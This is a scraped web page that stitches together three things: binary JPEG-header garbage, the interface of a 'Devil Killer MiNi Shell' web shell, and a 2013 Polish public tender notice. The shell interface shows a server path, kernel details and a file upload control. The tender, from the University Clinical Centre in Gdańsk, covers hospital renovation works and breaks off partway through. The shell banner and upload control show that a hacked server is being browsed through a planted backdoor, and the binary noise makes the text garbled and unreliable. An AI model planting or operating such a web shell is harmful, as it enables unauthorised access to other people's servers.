JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130925/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130925/389152-N-2013.html

<p class="kh_header"><b>Gdańsk: Wykonanie robót budowlanych w budynkach Uniwersyteckiego Centrum Klinicznego w Gdańsku</b><br>
<b>Numer ogłoszenia: 389152 - 2013; data zamieszczenia: 25.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersyteckie Centrum Kliniczne , ul. Dębinki 7, 80-952 Gdańsk, woj. pomorskie, tel. 58 3491248, faks 58 3492074, 3461178.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uck.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych w budynkach Uniwersyteckiego Centrum Klinicznego w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie robót budowlanych w budynkach Uniwersyteckiego Centrum Klinicznego w Gdańsku.
2.	Zamówienie podzielone zostało na cztery części:
1)	Część 1 - wykonanie robót remontowych w gabinecie zabiegowym oraz korytarzu w II Klinice Kardiologii i Elektroterapii Serca w budynku nr 8. Szczegółowy zakres robót objętych niniejszą częścią zamówienia zawarty jest w dokumentacji stanowiącej Załącznik nr 5 do SIWZ.
2)	Część 2 - wykonanie robót malarskich w Oddziale Chirurgii Naczyniowej Kliniki Kardiochirurgii w budynku nr 4. Szczegółowy zakres robót objętych niniejszą częścią zamówienia zawarty jest w dokumentacji stanowiącej Załącznik nr 6 do SIWZ.
3)	Część 3 - wykonanie robót remontowych w pomieszczeniach Kliniki Ginekologii w obiekcie przy ul. Klinicznej 1A. Szczegółowy zakres robót objętych niniejszą częścią zamówienia zawarty jest w dokumentacji stanowiącej Załącznik nr 7 do SIWZ.
4)	Część 4 - adaptacja pomieszczeń po Ginekologii na dwa pokoje Matki z dzieckiem z wydzieleniem łazienek w Klinice Położnictwa w obiekcie przy ul. Klinicznej 1a. Szczegółowy zakres robót objętych niniejszą częścią zamówienia zawarty jest w dokumentacji stanowiącej Załącznik nr 8 do SIWZ.
3.	Wykonawca jest zobowiązany do wykonania z należytą starannością wszelkich robót i czynności niezbędnych dla zrealizowania przedmiotu zamówienia, w celu przekazania Zamawiającemu dzieła budowlanego.
4.	Roboty będą prowadzone zgodnie z polskim Prawem Budowlanym.
5.	Wykonawca jest zobowiązany wykonać pełny zakres robót, który jest konieczny z punktu widzenia dokumentacji, przepisów prawa, wiedzy technicznej i sztuki budowlanej, dla uzyskania końcowego efektu określonego przez przedmiot zamówienia, a więc wykonać zadania bez względu na występujące trudności i nieprzewidziane okoliczności jakie mogą wystąpić w trakcie realizacji.
6.	Warunki prowadzenia robót 
1)	Zamawiający przekaże Wykonawcy pomieszczenia objęte przedmiotem zamówienia. 
2)	Roboty należy prowadzić w sposób zapewniający bezpieczeństwo osób przebywających w budynku.
3)	Wykonawca zobowiązany jest do prowadzenia robót w sposób nie powodujący dewastacji pomieszczeń i terenu obiektu oraz zapewniający wymagane warunki techniczno-użytkowe.
4)	Wykonawca zobowiązany jest :
a)	odgrodzić strefę roboczą przed dostępem osób trzecich poprzez ogrodzenie, oznakowanie,
b)	utrzymać w należytym porządku i czystości wspólnie użytkowane drogi komunikacyjne,
c)	przestrzegać przepisów bhp i ppoż. w okresie realizacji robót.
5)	Materiały i wyroby użyte do wykonania przedmiotu zamówienia winny spełniać wymogi określone w:
a)	Ustawie - Prawo budowlane (Dz. U. z 2010 r. Nr 243 poz. 1623 z późniejszymi zmianami),
b)	Ustawie o wyrobach budowlanych z dn.16.04.2004 r. (Dz.U.04.92.881 z dnia 30.04.2004 r.).
6)	Wykonawca zobowiązany jest do wywiezienia na legalne wysypisko materiałów z demontażu i gruzu z rozbiórek. Koszty wywozu i utylizacji należy uwzględnić w wynagrodzeniu ryczałtowym a dokumenty potwierdzające dokonanie ww wywozu na legalne wysypisko należy dostarczyć Zamawiającemu.
7)	Wykonawca uporządkuje pomieszczenia objęte robotami budowlanymi po zakończeniu robót. 
8)	Wykonawca udzieli gwarancji jakości na wykonany przedmiot zamówienia na okres 36 miesięcy.
7.	Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedną lub kilka części.
8.	Zamawiający nie dopuszcza składania ofert wariantowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.41.00.00-4, 45.43.22.10-9, 45.44.21.00-8, 45.45.00.00-6, 45.11.12.20-6, 45.26.23.21-7, 45.26.25.00-6, 45.32.10.00-3, 45.42.11.31-1, 45.42.11.32-8, 45.43.12.00-9, 32.41.30.00-1, 45.11.13.00-1, 45.26.23.21-7, 45.31.00.00-3, 45.33.00.00-9, 45.42.11.52-4, 45.43.11.00-8, 45.31.00.00-3, 45.32.00.00-6, 45.33.12.10-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium w prawidłowej wysokości: Część 1 - 600,00 zł; Część 2 - 480,00 zł; Część 3 - 450,00 zł; Część 4 - 1700,00 zł.
2.	Wadium może być wniesione w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej (musi być poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych oraz poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (art. 45 ust. 6 ustawy). 
3.	Wadium wnosi się przed upływem terminu składania ofert.
4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na poniższy rachunek bankowy Zamawiającego: BZ WBK S.A. o/Gdańsk nr: 94 10901098 0000000009016749. Wykonawca wnoszący wadium w pieniądzu zobowiązany jest do wpłacenia go odpowiednio wcześniej, tak aby znalazło się ono na koncie Zamawiającego przed datą i godziną składania ofert.
5.	Wadium wnoszone w formie niepieniężnej powinno być wystawione na Uniwersyteckie Centrum Kliniczne, ul. Dębinki 7, 80-952 Gdańsk. Oryginał dokumentu należy złożyć w opisanej kopercie wraz               z ofertą, natomiast potwierdzoną za zgodność z oryginałem kserokopię należy dołączyć do oferty.
6.	Dokument poręczenia/gwarancyjny powinien przewidywać utratę wadium na rzecz Zamawiającego w przypadkach określonych w pkt. 7 i 8.
7.	Wykonawca traci wadium na rzecz Zamawiającego, wraz z odsetkami, w przypadku, gdy Wykonawca, którego oferta została wybrana:
a.	odmówi podpisania umowy na warunkach określonych w ofercie,
b.	nie wniesie zabezpieczenia należytego wykonania umowy,
c.	zawarcie umowy będzie niemożliwe z przyczyn leżących po stronie Wykonawcy.
8.	Ponadto Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie do uzupełnienia dokumentów, o którym mowa w art. 26 ust. 3 ustawy, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
9.	Wadium musi zabezpieczać ofertę w całym okresie związania ofertą, który wynosi 30 dni od upływu terminu składania ofert.
10.	Zamawiający zwróci wadium dla Wykonawcy na zasadach określonych w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał co najmniej dwie roboty budowlane polegające na budowie lub przebudowie lub rozbudowie lub remoncie lub modernizacji budynków użyteczności publicznej, z których wartość każdej z nich była nie mniejsza niż:
a)	Część 1 - 10 000,00 PLN brutto,
b)	Część 2 - 8 000,00 PLN brutto,
c)	Część 3 - 7 000,00 PLN brutto,
d)	Część 4 - 25 000 PLN brutto.
W przypadku złożenia oferty przez jednego wykonawcę na więcej części przedmiotu zamówienia wykonawca winien wykazać, iż wykonał co najmniej dwie roboty budowlane polegające na budowie lub przebudowie lub rozbudowie lub remoncie lub modernizacji budynków użyteczności publicznej,z których wartość każdej z nich była nie mniejsza niż suma wartości wskazanych dla odpowiednich części, na które wykonawca składa ofertę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów nie zależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 2.Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1., zastępuje się je dokumentem zawierającym oświadczenie w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość dokonywania istotnych zmian postanowień Umowy, także w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, poprzez kolejno numerowane aneksy sporządzone w formie pisemnej pod rygorem nieważności, w przypadku wystąpienia co najmniej jednej okoliczności z wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)	zmiana terminu realizacji Umowy:
a)	wykonanie przedmiotu Umowy w określonym terminie nie leży w interesie Zamawiającego,
b)	w przypadku zmiany obowiązujących przepisów prawa, uniemożliwiających wykonanie przedmiotu Umowy w założonym terminie. Zamawiający dopuszcza taką sytuację tylko w sytuacji gdy ww. zmiany obowiązujących przepisów prawa, były niemożliwe do przewidzenia do upływu terminu składania oferty,
c)	działania siły wyższej uniemożliwiającej wykonanie Umowy w określonym pierwotnie terminie.
2)	zmiany wynagrodzenia będące wynikiem zmiany wysokości stawek podatku VAT.
3)	pozostałe zmiany:
a)	zmiana sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy na skutek okoliczności których nie można było wcześniej przewidzieć,
b)	zmiany w zakresie przedmiotu zamówienia, jeżeli konieczność wprowadzenia takich zmian jest skutkiem zmiany przepisów prawa,
c)	zmiany wynagrodzenie w przypadku ograniczenia przez zamawiającego zakresu przedmiotu umowy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy.
2.	Nie stanowi zmiany Umowy zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego) oraz zmiany danych teleadresowych i zmiany osób wskazanych do kontaktów miedzy stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.uck.gda.pl/zamowienia.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych UCK, ul. Dębinki 7, 80-952 Gdańsk..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2013 godzina 10:30, miejsce: Sekretariat Dyrektora Naczelnego Uniwersyteckiego Centrum Klinicznego, 80-952 Gdańsk, ul. Dębinki 7, budynek nr 9 - I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
2.	Zamawiający nie dopuszcza składania ofert wariantowych.
3.	Zamawiający dopuszcza składanie ofert częściowych. 
4.	Zamawiający przewiduje możliwość dokonywania istotnych zmian postanowień Umowy, także w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, poprzez kolejno numerowane aneksy sporządzone w formie pisemnej pod rygorem nieważności, w przypadku wystąpienia co najmniej jednej okoliczności z wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)	zmiana terminu realizacji Umowy:
a)	wykonanie przedmiotu Umowy w określonym terminie nie leży w interesie Zamawiającego,
b)	w przypadku zmiany obowiązujących przepisów prawa, uniemożliwiających wykonanie przedmiotu Umowy w założonym terminie. Zamawiający dopuszcza taką sytuację tylko w sytuacji gdy ww. zmiany obowiązujących przepisów prawa, były niemożliwe do przewidzenia do upływu terminu składania oferty,
c)	działania siły wyższej uniemożliwiającej wykonanie Umowy w określonym pierwotnie terminie.
2)	zmiany wynagrodzenia będące wynikiem zmiany wysokości stawek podatku VAT.
3)	pozostałe zmiany:
a)	zmiana sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy na skutek okoliczności których nie można było wcześniej przewidzieć,
b)	zmiany w zakresie przedmiotu zamówienia, jeżeli konieczność wprowadzenia takich zmian jest skutkiem zmiany przepisów prawa,
c)	zmiany wynagrodzenie w przypadku ograniczenia przez zamawiającego zakresu przedmiotu umowy z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy.
5.	Nie stanowi zmiany Umowy zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego) oraz zmiany danych teleadresowych i zmiany osób wskazanych do kontaktów miedzy stronami.


6.	Wskazanie powyższych okoliczności umożliwiających uzgodnienie zmian umowy nie stanowi jednoczesnego zobowiązania Zamawiającego do takiego uzgodnienia
7.	W przypadku gdy wartości podane przez Wykonawców na oświadczeniach i dokumentach, o których mowa w pkt. III.3 ogłoszenia, podane będą w walucie innej niż PLN, Zamawiający przeliczy te wartości na PLN przyjmując średni kurs NBP danej waluty na dzień wszczęcia postępowania
8.	Wszelkie nieuregulowane w niniejszym SIWZ czynności, uprawnienia, obowiązki Wykonawców i Zamawiającego, których ustawa nie nakazała zawierać Zamawiającemu w SIWZ, a które mogą przyczynić się do właściwego przebiegu postępowania, reguluje ustawa z dnia 29.01.2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2013 r., poz. 907 z późn. zm.)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1)	Część 1 - wykonanie robót remontowych w gabinecie zabiegowym oraz korytarzu w II Klinice Kardiologii i Elektroterapii Serca w budynku nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 - wykonanie robót remontowych w gabinecie zabiegowym oraz korytarzu w II Klinice Kardiologii i Elektroterapii Serca w budynku nr 8. Szczegółowy zakres robót objętych niniejszą częścią zamówienia zawarty jest w dokumentacji stanowiącej Załącznik nr 5 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.41.00.00-4, 45.43.22.10-9, 45.44.21.00-8, 45.45.00.00-6, 45.11.12.20-6, 45.26.23.21-7, 45.26.25.00-6, 45.32.10.00-3, 45.42.11.31-1, 45.42.12.32-8, 32.41.30.00-1, 45.11.13.00-1, 45.26.23.21-7, 45.31.00.00-3, 45.33.00.00-9, 45.42.11.52-4, 45.43.11.00-8, 45.31.00.00-3, 45.32.00.00-6, 45.33.12.10-1, 45.42.11.31-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie robót malarskich w Oddziale Chirurgii Naczyniowej Kliniki Kardiochirurgii w budynku nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - wykonanie robót malarskich w Oddziale Chirurgii Naczyniowej Kliniki Kardiochirurgii w budynku nr 4. Szczegółowy zakres robót objętych niniejszą częścią zamówienia zawarty jest w dokumentacji stanowiącej Załącznik nr 6 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.41.00.00-4, 45.43.22.10-9, 45.44.21.00-8, 45.45.00.00-6, 45.11.12.20-6, 45.26.23.21-7, 45.26.25.00-6, 45.32.10.00-3, 45.42.11.31-1, 45.42.11.32-8, 45.43.12.00-9, 32.41.30.00-1, 45.11.13.00-1, 45.26.23.21-7, 45.31.00.00-3, 45.33.00.00-9, 45.42.11.52-4, 45.43.11.00-8, 45.31.00.00-3, 45.32.00.00-6, 45.33.12.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie robót remontowych w pomieszczeniach Kliniki Ginekologii w obiekcie przy ul. Klinicznej 1A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3 - wykonanie robót remontowych w pomieszczeniach Kliniki Ginekologii w obiekcie przy ul. Klinicznej 1A. Szczegółowy zakres robót objętych niniejszą częścią zamówienia zawarty jest w dokumentacji stanowiącej Załącznik nr 7 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.41.00.00-4, 45.43.22.10-9, 45.44.21.00-8, 45.45.00.00-6, 45.11.12.20-6, 45.26.23.21-7, 45.26.25.00-6, 45.32.10.00-3, 45.42.11.31-1, 45.42.11.32-8, 45.43.12.00-9, 32.41.30.00-1, 45.11.13.00-1, 45.26.23.21-7, 45.31.00.00-3, 45.33.00.00-9, 45.42.11.52-4, 45.43.11.00-8, 45.31.00.00-3, 45.32.00.00-6, 45.33.12.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Adaptacja pomieszczeń po Ginekologii na dwa pokoje Matki z dzieckiem z wydzieleniem łazienek w Klinice Położnictwa w obiekcie przy ul. Klinicznej 1a.</p>
